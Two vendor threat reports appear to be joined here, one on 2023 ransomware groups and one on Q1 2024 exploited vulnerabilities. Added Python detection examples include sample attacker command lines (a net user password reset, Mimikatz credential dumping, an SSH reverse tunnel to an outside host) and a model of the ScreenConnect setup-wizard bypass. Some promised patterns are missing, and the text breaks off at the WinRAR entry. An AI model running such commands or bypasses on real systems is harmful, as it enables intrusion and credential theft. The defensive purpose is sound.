Kaspersky collected data on targeted ransomware groups and their attacks from multiple relevant public sources, for the years 2022 and 2023, filtered and validated it. The research reveals a 30% global increase in the number of targeted ransomware groups compared to 2022, with the number of known victims of their attacks rising by a staggering 71%.

Unlike random attacks, these targeted groups focus on governments, high-profile organizations, or specific individuals within an organization. Moreover, most of them distribute their malware under the Ransomware-as-a-Service (RaaS) model, which involves a number of smaller groups (called affiliates) getting access to the ransomware for a subscription fee or a portion of the ransom. In the graph below, you can see the ransomware families that were most active in 2023.

Most active ransomware families by number of victims, 2023

The ransomware most frequently encountered in organizations’ systems in 2023 was Lockbit 3.0. The reason for its remarkable activity may be the leak of its builder in 2022. That led to various independent groups using the builder to create custom ransomware variants, which they then used to target organizations all over the world. The group itself also has a large affiliate network. Second was BlackCat/ALPHV, which first appeared in December 2021. In December 2023, the FBI, together with other law enforcement agencies, disrupted BlackCat’s operations and seized several websites of the group. However, immediately after the operation, BlackCat stated that it had “unseized” at least some of the sites. The US Department of State offers a $10 million bounty for information on the group’s associates. The third most active ransomware in 2023 was Cl0p. This group breached the MOVEit managed file transfer system to get to its customers’ data. According to New Zealand security firm Emsisoft, as of December 2023, this breach had affected over 2,500 organizations.

Other notable ransomware variants

In our threat research practice, among the threats we analyze are various ransomware samples. This section shares brief descriptions of several noteworthy families that, although not being the most active in 2023, are interesting in some way or another.

  • BlackHunt: Detected in late 2022 and updated in 2023, BlackHunt targets global victims using a C++ executable, which is based on Conti ransomware source code. It utilizes customizable attack vectors, including deceptive tactics like a fake Windows Update screen displayed to mask the file encryption process, and employs security measures for testing purposes, such as checking for “Vaccine.txt” before executing. If the malware author wants to test the executable without encrypting their own files, they create a Vaccine.txt file. If the malware finds this file in the system, it doesn’t proceed with encryption.
  • Rhysida: Emerging in May 2023, Rhysida is a new RaaS operation initially targeting Windows but later expanding to Linux. Both versions use AES and RSA algorithms for file encryption, and the ChaCha stream cipher in the key generation process. The ransomware also implements token-based access to its hidden service for enhanced secrecy.
  • Akira: A compact C++ ransomware compatible with both Windows and Linux, Akira has impacted over 60 organizations across various sectors. It employs a single key for encryption, and featured an encryption flaw in early versions, which made file decryption possible without the ransomware operators’ knowledge. However, this flaw was fixed in recent variants, which are not decryptable at the time of writing this report. For victim communication, Akira utilizes a minimalistic jQuery Terminal-based hidden service.
  • Mallox: Also known as Fargo and TargetCompany, Mallox has been wreaking havoc since its appearance in May 2021. With an increase in attacks in 2023 and nearly 500 identified samples, it continues to evolve with frequent updates and an active affiliate program as of 2024. Operating through both clearnet and TOR servers, Mallox targets internet-facing MS SQL and PostgreSQL servers and spreads through malicious attachments. The most affected countries include Brazil, Vietnam, China, Saudi Arabia, and India.
  • 3AM: A new RaaS variant, 3AM features a sophisticated command-line interface, and an “access key” feature for protection against automatic sandbox execution: to be executed, the ransomware requires an access key. As is the case with most human-operated ransomware, 3AM affiliates get an initial foothold in the target infrastructure using Cobalt Strike. In Cobalt Strike, they use the watermark option, which allows the attackers to uniquely identify beacon traffic associated with a specific Cobalt Strike team server. This may suggest that 3AM affiliates share access to the target with other ransomware groups, and use the watermark to separate their traffic from the others. The ransomware employs efficient file-processing techniques, such as reverse traversal (processing strings from the end to quickly identify file paths and extensions) and integration with Windows API, and terminates various processes before encryption to complicate recovery efforts. Communication with victims is through a TOR-based hidden service, though with operational security misconfigurations such as real IP exposure.

Trends observed in our incident response practice

This section contains trends and statistics based on the incidents our incident response service dealt with in 2023. The figures in this section may differ from those obtained from public sources, because they don’t cover all ransomware-related incidents that occurred last year.

According to our incident response team, in 2023, every third incident (33.3%) was related to ransomware, which remained the primary threat to all organizations, whatever sector of economy or industry they belonged to.

Another important trend observed in 2023: attacks via contractors and service providers, including IT services, became one of the top three attack vectors for the first time. This approach facilitates large-scale attacks with less effort, often going undetected until data leaks or encrypted data are discovered. For ransomware specifically, trusted relationship attacks were one of the four main initial infection vectors. The other three were: compromise of internet-facing applications, which accounted for 50% of all ransomware attacks; compromised credentials (40%), of which 15% were obtained as a result of brute force attacks; and phishing.

Among the ransomware families most frequently encountered in our incident response practice in 2023 were Lockbit (27.78%), BlackCat (12.96%), Phobos (9.26%), and Zeppelin (9.26%). Most of the data encryption attacks ended within a day (43.48%) or days (32.61%). The rest lasted for weeks (13.04%), while only 10.87% lasted for more than a month. Practically all the long ransomware attacks (those lasting weeks and months), in addition to data encryption, also featured data leakage.

Ransomware groups’ tactics and techniques

Ransomware groups have continued to employ previously identified strategies for intrusion, utilizing similar tools and techniques. Adversaries have targeted internet-facing applications vulnerable to remote command execution (RCE), such as applications running vulnerable versions of Log4j. Exploiting vulnerabilities in these applications, adversaries have gained unauthorized access and compromised infrastructures.

Once exploitation is confirmed, adversaries typically proceed by manipulating local privileged accounts responsible for application execution. They execute commands to modify user passwords and upload a set of tools, such as Meterpreter and Mimikatz, to the compromised system. By executing Meterpreter and creating or modifying system processes, adversaries gain additional access and establish persistence on the compromised system.

In some instances, adversaries exploit vulnerabilities in public-facing applications within the organization’s infrastructure and utilize tools like BloodHound and Impacket for lateral movement within networks and gaining knowledge of the target infrastructure. However, to evade endpoint controls, they also have adopted different techniques, such as using the Windows Command Shell to collect event logs and extract valid usernames.

Additionally, adversaries leverage native Windows SSH commands for command and control (C2) communications and data exfiltration. After identifying paths to reach remote systems with internet access, they configure SSH backdoors and establish reverse tunneling for data exchange.
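The four post-exploitation steps just described leave distinctive process-creation events, and each can be matched with a short rule. The script below is an added example, not code from the Securelist post: it runs four rules over constructed Sysmon Event ID 1-style records (the field names and command lines are assumptions for the example) and reports a local account password reset, event-log harvesting from a shell, Mimikatz module syntax on a command line, and the native OpenSSH client started with `-R`, the reverse port forward that backs the tunneling described above. A plain interactive `ssh user@host` is included to show it does not fire.

```python
"""Added example (not code from the Securelist post): match the post-exploitation
steps above against Windows process-creation events. Events are constructed JSON
lines in a Sysmon Event ID 1-like shape; field names, command lines and the rules
are illustrative assumptions, not a tuned detection ruleset."""
import json
import re

SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"ts": "2023-11-02T03:14:07Z", "host": "app01", "user": "NT AUTHORITY\\SYSTEM",
     "parent": "C:\\app\\tomcat\\bin\\java.exe",
     "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe /c net user svc_app Summ3r2023! && net localgroup administrators svc_app /add"},
    {"ts": "2023-11-02T03:16:40Z", "host": "app01", "user": "APP01\\svc_app",
     "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\wevtutil.exe",
     "cmdline": "wevtutil qe Security /q:\"*[System[(EventID=4624)]]\" /f:text /c:500"},
    {"ts": "2023-11-02T03:20:02Z", "host": "app01", "user": "APP01\\svc_app",
     "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe /c C:\\Users\\Public\\m.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" exit"},
    {"ts": "2023-11-02T03:25:11Z", "host": "app01", "user": "APP01\\svc_app",
     "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\OpenSSH\\ssh.exe",
     "cmdline": "ssh.exe -N -R 0.0.0.0:2222:127.0.0.1:3389 -i C:\\Users\\Public\\k ops@203.0.113.50 -p 443"},
    {"ts": "2023-11-02T09:01:00Z", "host": "app01", "user": "APP01\\jdoe",
     "parent": "C:\\Windows\\System32\\WindowsTerminal.exe",
     "image": "C:\\Windows\\System32\\OpenSSH\\ssh.exe",
     "cmdline": "ssh.exe jdoe@10.0.0.20"},
])


def parse_events(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def rule_account_manipulation(ev):
    """`net user <name> <password>`: resetting a local account's password."""
    m = re.search(r"\bnet1?(?:\.exe)?\s+user\s+(\S+)\s+(\S+)", ev["cmdline"], re.I)
    if m and not m.group(2).startswith("/"):
        return f"net user {m.group(1)} <password>"
    return None


def rule_eventlog_collection(ev):
    """wevtutil query/export launched from cmd.exe or PowerShell: harvesting
    event logs (e.g. logon events) to enumerate valid usernames."""
    if _basename(ev["image"]) != "wevtutil.exe":
        return None
    if _basename(ev["parent"]) not in ("cmd.exe", "powershell.exe"):
        return None
    m = re.match(r"\S+\s+(qe|epl)\s+(\S+)", ev["cmdline"], re.I)
    return f"wevtutil {m.group(1)} {m.group(2)}" if m else None


def rule_credential_dumping(ev):
    """Mimikatz module syntax on the command line, whatever the binary is named."""
    if re.search(r"\b(sekurlsa|lsadump|privilege)::", ev["cmdline"], re.I):
        return "mimikatz module syntax on command line"
    return None


def rule_ssh_reverse_tunnel(ev):
    """Native OpenSSH client started with -R: a reverse port forward that
    exposes an internal service (here RDP) on the attacker's host."""
    if _basename(ev["image"]) != "ssh.exe":
        return None
    m = re.search(r"(?:^|\s)-R\s*(\S+)", ev["cmdline"])
    if not m:
        return None
    target = re.search(r"\s(\S+@\S+)", ev["cmdline"])
    return f"-R {m.group(1)} to {target.group(1) if target else '?'}"


RULES = [
    ("account_manipulation", rule_account_manipulation),
    ("eventlog_collection", rule_eventlog_collection),
    ("credential_dumping", rule_credential_dumping),
    ("ssh_reverse_tunnel", rule_ssh_reverse_tunnel),
]


def detect(events):
    """Return (ts, host, rule, detail) for every rule that fires on an event."""
    findings = []
    for ev in events:
        for name, rule in RULES:
            detail = rule(ev)
            if detail:
                findings.append((ev["ts"], ev["host"], name, detail))
    return findings


if __name__ == "__main__":
    for ts, host, name, detail in detect(parse_events(SAMPLE_EVENTS)):
        print(f"{ts} {host} {name}: {detail}")
```

The rules are deliberately keyed on command-line shape rather than binary names, because in the incidents described the tooling is renamed or built in (Mimikatz copied as an arbitrary executable, the OS’s own `ssh.exe`); the `-R` rule in particular is worth pairing with a check that the SSH destination is outside your address space.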

Overall, ransomware groups demonstrate a sophisticated understanding of network vulnerabilities and utilize a variety of tools and techniques to achieve their objectives. The use of well-known security tools, exploitation of vulnerabilities in public-facing applications, and the use of native Windows commands highlight the need for robust cybersecurity measures to defend against ransomware attacks and domain takeovers.

Ransomware: becoming a matter of national and international security

Over the past few years, the impact of ransomware attacks on public and private organizations has escalated to the point of threatening national security. This growing threat has led to ransomware being highlighted in national cybersecurity strategies, annual reports from cybersecurity regulators, and intergovernmental discussions at forums like the UN Open-ended Working Group (OEWG) on cybersecurity. The frequency and disruptive character of ransomware attacks has become unsustainable for governments, prompting them to pool resources and develop both national and multi-country initiatives to combat ransomware groups.

One notable initiative is the formation in 2021 of the international Counter Ransomware Initiative (CRI), which brings together 49 countries and INTERPOL. Through the CRI, there has been a concerted effort to share cybersecurity information, disrupt attackers’ operations, and tackle the financial mechanisms that fuel ransomware attacks. CRI members have also endorsed a statement advocating against ransom payments by institutions under national government authority, signaling the need for a new global norm and standard around ransomware payments. Countries like Singapore and the United Kingdom have played pivotal roles within the CRI, focusing on understanding the ransomware payment ecosystem and advocating for policies that counter ransomware financing.

Legislative measures and policy actions are central to the fight against ransomware. In the United States, legislation like the Cyber Incident Reporting for Critical Infrastructure Act of 2022 aims to enhance incident reporting and resilience against attacks. In early 2023, France implemented a law that conditioned insurance coverage on the prompt reporting of cybersecurity incidents.

State agencies’ reporting on ransomware indicates that fighting this threat is a priority for authorities. In its latest IT Security Report 2023, the BSI (Germany) identifies ransomware as the biggest cybersecurity threat to Germany, noting the shift from “big game hunting” to targeting smaller companies and municipal administrations.

Last but not least, law enforcement agencies around the globe are joining forces in operations aimed at dismantling ransomware networks. In 2023, international operations seized the infrastructure of such ransomware groups as Hive, BlackCat, and Ragnar Locker. Early 2024 saw Operation Cronos disrupt Lockbit and obtain its decryption keys, and in May 2024 the group’s leader was unmasked and sanctioned. Although cybercriminals usually rebuild their infrastructure afterwards, these efforts at the very least make running a ransomware operation much more expensive and cut into its income by decrypting victims’ data for free. These and other efforts underscore a comprehensive approach to fighting ransomware. By combining international cooperation, legislative action, and financial oversight, countries aim to mitigate the global threat and impact of ransomware attacks effectively.

Ransomware – what to expect in 2024

As we look ahead to 2024, we observe a significant shift in the ransomware ecosystem. While many prominent ransomware gangs have disappeared, smaller and more elusive groups are emerging. This rise can be attributed to leaked source code and tools from larger groups that have disbanded or gone defunct.

As officials discuss counter-ransomware measures and law enforcement authorities around the globe link up to combat cybercrime, ransomware operations are becoming increasingly fragmented. Larger, more coordinated groups are breaking down into smaller factions, making it more challenging for law enforcement to target them. Moreover, each of these smaller groups has less impact and is of less interest to law enforcement, and thus has a reduced likelihood of being tracked and prosecuted, giving independent ransomware actors a higher chance of escaping arrest.

In conclusion, ransomware attacks remain a significant and evolving threat in the realm of cybersecurity. From high-profile breaches affecting critical sectors to attacks on small businesses, the impact of ransomware continues to expand. As we reflect on the state of ransomware, several key observations and trends emerge.

To mitigate the risk of ransomware attacks, individuals and organizations should prioritize cybersecurity measures.

  • Use robust, properly-configured security solutions like Kaspersky NEXT.
  • Implement Managed Detection and Response (MDR) to proactively seek out threats.
  • Disable unused services and ports to minimize the attack surface.
  • Keep all systems and software up to date with regular updates and patches.
  • Conduct regular penetration tests and vulnerability scanning to identify and address vulnerabilities promptly.
  • Provide comprehensive cybersecurity training to employees to raise awareness of cyberthreats and best practices for mitigation.
  • Establish and maintain regular backups of critical data, and test backup and recovery procedures regularly.
  • Use Threat Intelligence to keep track of the latest TTPs used by groups and adjust your detection mechanisms to catch these.
  • Pay special attention to any “new” software being run and installed on systems within your network (including legitimate software).

Exploits and vulnerabilities in Q1 2024

7 Květen, 2024 - 12:00

We at Kaspersky continuously monitor the evolving cyberthreat landscape to ensure we respond promptly to emerging threats, equipping our products with detection logic and technology. Software vulnerabilities that threat actors can exploit or are already actively exploiting are a critical component of that landscape. In this report, we present a series of insightful statistical and analytical snapshots relating to the trends in the emergence of new vulnerabilities and exploits, as well as the most prevalent vulnerabilities being used by attackers. Additionally, we take a close look at several noteworthy vulnerabilities discovered in Q1 2024.

Statistics on registered vulnerabilities

To facilitate the management of vulnerabilities, vendors can register these and assign CVE identifiers. All identifiers and related public information are published on https://cve.mitre.org (at the time of writing, the site is in the process of migrating to a new domain, https://www.cve.org/). Although vendors often fail to register vulnerabilities, and the CVE list cannot be considered exhaustive, it does allow us to track certain trends. We analyzed data on registered software vulnerabilities and compared their quantities over the past five years.

The number of newly registered CVEs, 2019 — 2024. The decline in 2024 is due to data being available for Q1 only

As the chart illustrates, the number of new vulnerabilities has been steadily increasing year over year. This can be attributed to several factors.

Firstly, the growing popularity of bug bounty platforms and vulnerability discovery competitions have provided a major impetus to research in the field. As a result, vulnerability discoveries have been on the rise. This also leads to more vendors registering the discovered vulnerabilities, resulting in a growing number of CVEs.

Secondly, companies developing popular software, operating systems, and programming languages are implementing more security solutions and new procedures that improve the performance of vulnerability monitoring in software. On the one hand, this leads to vulnerabilities being discovered more frequently; on the other, entire categories of vulnerabilities become obsolete. As a result, both threat actors and security researchers striving to stay ahead are actively searching for new types of vulnerabilities and creating automated services that allow for even more efficient detection.

Finally, new applications appear with time as existing ones get updates and become more complex, spawning new vulnerabilities. With the rapid pace of technological evolution, the number of discovered vulnerabilities is likely to continue to grow year after year.

It is important to note that different vulnerabilities pose different levels of security threats. In particular, some of them may be categorized as critical. We used the data in the list of registered CVEs and the results of internal reproducibility tests to calculate the share of critical vulnerabilities.

The number of newly registered CVEs and the percentage of critical CVEs in these, 2019 — 2024. The decline in 2024 is due to data being available for Q1 only

As the chart shows, the growth in the number of critical vulnerabilities has been intermittent. In 2021 and 2022, the share of critical vulnerabilities among the total number was comparable, but it increased during the periods from 2019 through 2021 and from 2022 through 2023. The year 2023 was notable for a record number of critical vulnerabilities discovered in software. The percentage of critical vulnerabilities in the total number of registered ones remained high in Q1 2024. This once again emphasizes the importance of proper patch management and the need for security solutions capable of preventing vulnerability exploitation.

Exploitation statistics

This section presents exploit statistics gathered from both public sources, such as registered CVEs, and our in-house telemetry.

An exploit is a program containing data or executable code that takes advantage of one or more software vulnerabilities on a local or remote computer for malicious purposes. Software vulnerabilities that allow attackers to gain control over the target user’s system are of the highest value to exploit developers.

Exploits can be created by malicious actors who sell their creations on underground forums or use them to their own ends. Additionally, enthusiasts, including participants of various bug bounty programs, develop exploits to stay ahead of adversaries and devise countermeasures.

A dark web buy ad for zero- and one-day exploits

Windows and Linux vulnerability exploitation

The charts below show the trends in the number of Linux and Windows users protected by Kaspersky products who encountered vulnerability exploits in 2023 and Q1 2024. The statistics are based on data from the Kaspersky Security Network, provided by our users voluntarily.

Changes in the number of Windows users who encountered exploits, Q1 2023 — Q1 2024. The number of users who encountered exploits in Q1 2023 is taken as 100%

Changes in the number of Linux users who encountered exploits, Q1 2023 — Q1 2024. The number of users who encountered exploits in Q1 2023 is taken as 100%

As the charts demonstrate, the number of Windows users who experienced vulnerability exploitation remained roughly unchanged throughout 2023, whereas the number of affected Linux users increased steadily. It’s important to note that this doesn’t necessarily involve the same vulnerabilities in both cases. Some vulnerabilities quickly become obsolete, prompting threat actors to shift their focus to newer ones.

Let’s illustrate the changes in the popularity of certain vulnerabilities using the example of the CVE-2023-38831 vulnerability in WinRAR.

The popularity dynamics of the CVE-2023-38831 vulnerability in WinRAR, September 2023 — March 2024

The chart reveals that the vulnerability was quite popular almost immediately after it was registered in September 2023 but then gradually declined in relevance as users installed patches. This is just further evidence that malicious actors tend to take an interest in vulnerabilities as long as the number of users who have installed a fix is relatively small.

Public exploit statistics

The availability of an exploit, especially when accessible on public platforms like GitHub, is a key criterion in assessing the criticality of a vulnerability. We analyzed data on publicly available exploits for registered vulnerabilities.

The number of vulnerabilities and the percentage of those that have an exploit, 2019 — 2024

The statistics reveal an increase in the total number of exploits, encompassing both ready for use and raw PoCs. The latter may be unstable but they demonstrate the possibility of exploiting the vulnerability and hold potential for future refinement. It’s worth noting that malicious actors seek both new exploits and modifications to existing ones, such as optimization for compatibility with multiple operating systems, integration of new data processing methods, and stability enhancements.

A dark web ad seeking an exploit for the CVE-2023-40477 vulnerability in WinRAR

A dark web ad seeking assistance in configuring a CVE-2023-28252 exploit for older Windows versions

Most prevalent exploits

We continuously monitor exploits published for various vulnerabilities, with a particular focus on critical ones. Our analysis of these exploits has allowed us to single out several categories of software that are of particular interest to malicious actors:

  • Browsers;
  • Operating systems (Windows, Linux, macOS);
  • Microsoft Exchange servers and server components;
  • Microsoft SharePoint servers and server components;
  • The Microsoft Office suite;
  • All other applications that fall outside the five categories above.

Let’s see which software categories had the most critical vulnerabilities with working exploits in 2023 and Q1 2024.

The distribution of exploits for critical vulnerabilities by platform, 2023

The distribution of exploits for critical vulnerabilities by platform, Q1 2024

The data indicates that the software categories most affected by critical vulnerabilities with working exploits are:

  • Operating systems;
  • Browsers.

However, in Q1 2024, we also observed a significant number of exploits targeting Exchange servers. Additionally, a substantial portion of exploits falls into the “other software” category. This is due to the variety of applications that users may have installed on their systems to handle business tasks.

Vulnerability exploitation in APT attacks

Exploiting software vulnerabilities is an integral component of nearly every APT attack targeting enterprise infrastructures. We analyzed available data on exploits used in APT attacks for 2023 and Q1 2024 to determine which software is most frequently exploited by attackers. Below are the vulnerabilities that APT groups leveraged the most in 2023 and Q1 2024.

The top 10 vulnerabilities exploited in APT attacks, 2023

The top 10 vulnerabilities exploited in APT attacks, Q1 2024

The statistics presented above indicate that popular entry points for malicious actors currently are:

  • Vulnerable remote access services like Ivanti or ScreenConnect.
  • Vulnerable access control features like Windows SmartScreen.
  • Vulnerable office applications. Notably, exploits for the Microsoft Office suite, which long held the top of the most-exploited list, were superseded by a WinRAR vulnerability in 2023.

Therefore, we can conclude that APT groups mostly exploit vulnerabilities while gaining initial access to an infrastructure. In most cases, this involves either breaching the perimeter (for example, by exploiting vulnerable internet-facing services like VPNs and web applications) or exploiting office applications combined with social engineering (for example, by emailing infected documents or archives to company employees).

Notable Q1 2024 vulnerabilities

This section deals with the most interesting vulnerabilities registered in Q1 2024.

CVE-2024-3094 (XZ)

A backdoor was discovered within the XZ data compression utility package in late March. Attackers inserted malicious code into the source code of the library responsible for handling archived data. This code, through a modified build procedure, ended up in the compiled library. Upon loading such a library, the malicious code would begin modifying functions in memory that are exported by certain distributions for SSH server operation, enabling the attackers to send commands to the infected server.

The backdoor’s functionality is notable because the attackers managed to inject malicious algorithms into a popular library, a feat rarely accomplished in the history of open-source software. The attack also stands out for its complexity and the multi-stage infection process. No one but the author of the malicious code could have exploited the backdoor.

CVE-2024-20656 (Visual Studio)

This vulnerability in Visual Studio lets a malicious actor elevate their privileges in the system. An attacker can leverage it to execute a DACL reset attack on Windows. A DACL (Discretionary Access Control List) is an access control list that defines the level of access users have to perform specific operations on an object. Resetting a DACL removes all restrictions on accessing system files or directories, so any user can do whatever they wish with them. The vulnerability is intriguing due to its exploitation algorithm.

The exploit source code, which we analyzed, utilizes a method of redirecting the Visual Studio application debugging service from one directory to another through a symlink chain: DummyDir => Global\\GLOBALROOT\\RPC Control => TargetDir. Here, DummyDir is a publicly accessible directory created by the attacker, and TargetDir is the directory they want to gain access to. When the application debugging service is redirected from DummyDir to TargetDir, the latter inherits access settings identical to those of DummyDir.

This method of employing symlinks to perform selective actions on protected files is quite challenging to prevent, as not all files within a system can be write-protected. This implies that it could potentially be used to exploit other vulnerabilities in the future. If a file or dependency used by the targeted OS service is identified and its modification restrictions are removed, the user can simply overwrite this file or dependency after the exploit runs. Upon the next launch, the attacker-injected code will execute within the compromised service, inheriting the same access level as the service itself.

We are not currently aware of any cases of this vulnerability being leveraged in real-life attacks. However, it shares the same exploitation primitives with CVE-2023-36874, which malicious actors began exploiting even before it was discovered.

CVE-2024-21626 (runc)

OS-level virtualization, or containerization, is widely employed today for application scaling and building fault-tolerant systems. Therefore, vulnerabilities within systems that manage containers are of critical importance.

The vulnerability in question owes its existence to certain behavior of the fork system call in the Linux kernel. This system call’s characteristic feature is the method by which it launches a child process, which is copied from the parent process.

This functionality allows for rapid application startup but also presents a risk that developers may not always consider. Process cloning implies that some data from the parent process may be accessible from the child process. If the application code fails to keep track of such data, this can lead to a data disclosure vulnerability classified in the CWE category system as CWE-403 (Exposure of File Descriptor to Unintended Control Sphere).

CVE-2024-21626 is a case in point. The Docker toolkit uses the runc tool to create and run containers, so a running container is a child process of runc. If you access the /proc/self directory from inside that container, you obtain descriptors for all files opened by the runc process. In Linux, navigation of accessible resources and descriptors follows file system rules, so attackers quickly started using relative paths to interpreters accessible to the parent process to escape the container.
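The descriptor-inheritance behaviour described above, reduced to a stand-alone demonstration (an added example, not code from the post, runc or Docker): a parent holds a directory descriptor to a "host" directory, then forks and execs a child confined to a different working directory. With FD_CLOEXEC cleared (the weak setting) the child reads a file through the inherited descriptor by a relative path; with the default kept, exec() closes the descriptor and the access fails. The temp directories, `secret.txt` and the child program are all constructed here.

```python
"""Constructed demo of CWE-403 across fork()+exec(), and of the FD_CLOEXEC fix.
Nothing here touches runc, Docker or /proc; all paths live in temp directories."""
import os
import sys
import tempfile

# Program run in the exec'ed child. It receives the parent's descriptor number
# and tries openat(dir_fd, "secret.txt"): a *relative* path resolved against the
# inherited descriptor, so the child's own working directory does not matter.
CHILD_PROGRAM = r"""
import os, sys
dir_fd = int(sys.argv[1])
try:
    fd = os.open("secret.txt", os.O_RDONLY, dir_fd=dir_fd)
    sys.exit(0 if os.read(fd, 64) == b"host-only data" else 2)
except OSError:
    sys.exit(1)   # EBADF: the descriptor was closed on exec, or ENOTDIR/ENOENT
"""


def spawn_confined_child(dir_fd: int, leak_fd: bool, confined_cwd: str) -> int:
    """Fork and exec a child whose cwd is confined_cwd.
    Returns the child's exit status: 0 = secret read, 1 = access denied."""
    # Weak setting: mark the descriptor inheritable (clears FD_CLOEXEC) so that
    # exec() keeps it open. Corrected setting: leave Python's default, which is
    # non-inheritable (PEP 446), so exec() closes it and the child never sees it.
    os.set_inheritable(dir_fd, leak_fd)
    pid = os.fork()
    if pid == 0:
        os.chdir(confined_cwd)  # emulate the container's view of the file system
        os.execv(sys.executable, [sys.executable, "-c", CHILD_PROGRAM, str(dir_fd)])
        os._exit(127)           # only reached if execv itself fails
    _, status = os.waitpid(pid, 0)
    return os.WEXITSTATUS(status)


def secret_reachable(leak_fd: bool) -> bool:
    """Build the constructed layout, run the child, report whether it escaped."""
    host = tempfile.mkdtemp(prefix="host-")
    jail = tempfile.mkdtemp(prefix="container-root-")
    with open(os.path.join(host, "secret.txt"), "wb") as f:
        f.write(b"host-only data")
    dir_fd = os.open(host, os.O_RDONLY | os.O_DIRECTORY)
    try:
        return spawn_confined_child(dir_fd, leak_fd, jail) == 0
    finally:
        os.close(dir_fd)


if __name__ == "__main__":
    print("FD_CLOEXEC cleared, secret reachable from child:", secret_reachable(True))
    print("FD_CLOEXEC kept,    secret reachable from child:", secret_reachable(False))
```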

You can detect exploitation of this vulnerability by monitoring activity within a running container. The primary pattern observed during exploitation involves the container attempting to access the file system using the path:


CVE-2024-1708 (ScreenConnect)

ConnectWise ScreenConnect is a remote desktop access tool. It comprises client-side applications running on user systems and a server used for client management. The server hosts a web application that contains the vulnerability in question.

Access control is considered to be the most critical mechanism within web applications. It works only as long as every user-accessible function and parameter in the web application is monitored and validated before being used in the application’s algorithms. The request monitoring and control in ScreenConnect proved to be inadequate. An attacker could force the system to reset its settings by simply appending a “/” character to the original request URL like this: http://vuln.server/SetupWizard.aspx. As a result, the adversary could gain access to the system with administrator privileges and exploit the server for malicious purposes.

The vulnerability is being actively used by malicious actors. Therefore, we recommend that ScreenConnect users apply the patch released by the developers and configure firewall rules to restrict access to the server’s web interface.
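A toy model of the access-control mistake described above (an added example, not ScreenConnect's code): the router tolerates a trailing "/" and case differences, but the access gate compares the raw request path, so "/SetupWizard.aspx/" reaches the wizard after setup is complete. The hardened gate canonicalizes the path the same way the router does. A scan over constructed web-server log lines then flags such requests; host names, IP addresses and the log format are assumptions.

```python
"""Constructed model of a path-canonicalization mismatch between routing and
access control, plus a log scan for the variant spelling. Not ScreenConnect code."""
import re
from urllib.parse import urlsplit

SETUP_PATH = "/setupwizard.aspx"   # canonical form used by the router


def canonical_path(raw_path: str) -> str:
    """Collapse duplicate slashes, drop trailing slashes and case-fold, so every
    spelling of the same resource maps to one string."""
    path = re.sub(r"/+", "/", raw_path)
    if len(path) > 1:
        path = path.rstrip("/")
    return path.lower()


def is_setup_request_weak(raw_path: str) -> bool:
    """Weak gate: exact compare on the raw path; misses '/SetupWizard.aspx/'."""
    return raw_path == "/SetupWizard.aspx"


def is_setup_request_hardened(raw_path: str) -> bool:
    """Hardened gate: compare the same canonical form the router resolves."""
    return canonical_path(raw_path) == SETUP_PATH


def serve(raw_path: str, setup_complete: bool, hardened: bool) -> str:
    """Returns 'setup-wizard', 'forbidden' or 'other'. Once setup is complete the
    wizard must be unreachable; only the hardened gate guarantees that."""
    check = is_setup_request_hardened if hardened else is_setup_request_weak
    if setup_complete and check(raw_path):
        return "forbidden"
    # The router is tolerant of the trailing slash, which is what the gate must match.
    return "setup-wizard" if canonical_path(raw_path) == SETUP_PATH else "other"


# Constructed sample in common log format; 192.0.2.0/24 is a documentation range.
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Feb/2024:10:01:02 +0000] "GET /Login.aspx HTTP/1.1" 200 512',
    '192.0.2.77 - - [20/Feb/2024:10:01:09 +0000] "GET /SetupWizard.aspx/ HTTP/1.1" 200 8192',
    '192.0.2.77 - - [20/Feb/2024:10:01:15 +0000] "POST /SetupWizard.aspx/?step=1 HTTP/1.1" 302 0',
]
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def flag_setup_wizard_requests(lines):
    """Return every request that resolves to the setup wizard, noting whether it
    used a spelling other than the plain path (the pattern to hunt for post-setup)."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = urlsplit(m["target"]).path
        if canonical_path(path) == SETUP_PATH:
            hits.append({"ip": m["ip"], "method": m["method"], "path": path,
                         "variant": path != "/SetupWizard.aspx"})
    return hits


if __name__ == "__main__":
    print("weak gate:    ", serve("/SetupWizard.aspx/", setup_complete=True, hardened=False))
    print("hardened gate:", serve("/SetupWizard.aspx/", setup_complete=True, hardened=True))
    for hit in flag_setup_wizard_requests(SAMPLE_LOG):
        print(hit)
```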

CVE-2024-21412 (Windows Defender)

The primary objective of most attacks targeting user systems is the execution of malicious commands. Attackers aim to accomplish this task through various methods, but the most popular and reliable approach involves launching a malicious file. To minimize the risk of unauthorized application launches, Windows employs a mechanism known as the SmartScreen Filter. SmartScreen checks websites that the user visits and files downloaded from the internet. When the check starts, the user sees a lock screen.

Such a notification can prompt the user to reconsider whether they truly want to launch the application. Consequently, malicious actors are actively seeking ways to bypass this filter. CVE-2024-21412 represents one such method.

Deceiving the security mechanism relies on a simple principle: if SmartScreen checks files downloaded from the internet, just trick the filter into believing that the file was already in the system at the time of launch.

This can be achieved by interacting with a file stored in network storage. In the vulnerability in question, the storage resides on a WebDAV server. The WebDAV protocol allows multiple users to simultaneously edit a file stored on the server, and Windows provides capabilities for automatic access to such storage. All that remains for attackers is to present the server to the system in the appropriate manner. For this purpose, they use the following file URL:


CVE-2024-27198 (TeamCity)

This vulnerability in the web interface of the TeamCity continuous integration tool allows access to features that should be restricted to authenticated users. You can detect exploitation by analyzing the standard logs that TeamCity generates in its working directory. The malicious pattern appears as follows:

The improper handling of files with a blank name, as shown above, grants unauthorized attackers access to the server API.

Malicious actors leverage this vulnerability as a way of gaining initial access to targeted systems. For more efficient exploitation monitoring, we recommend auditing accounts with access to the web interface.

CVE-2023-38831 (WinRAR)

Although this vulnerability was discovered in 2023, we believe it warrants attention due to its popularity among malicious actors in both late 2023 and Q1 2024.

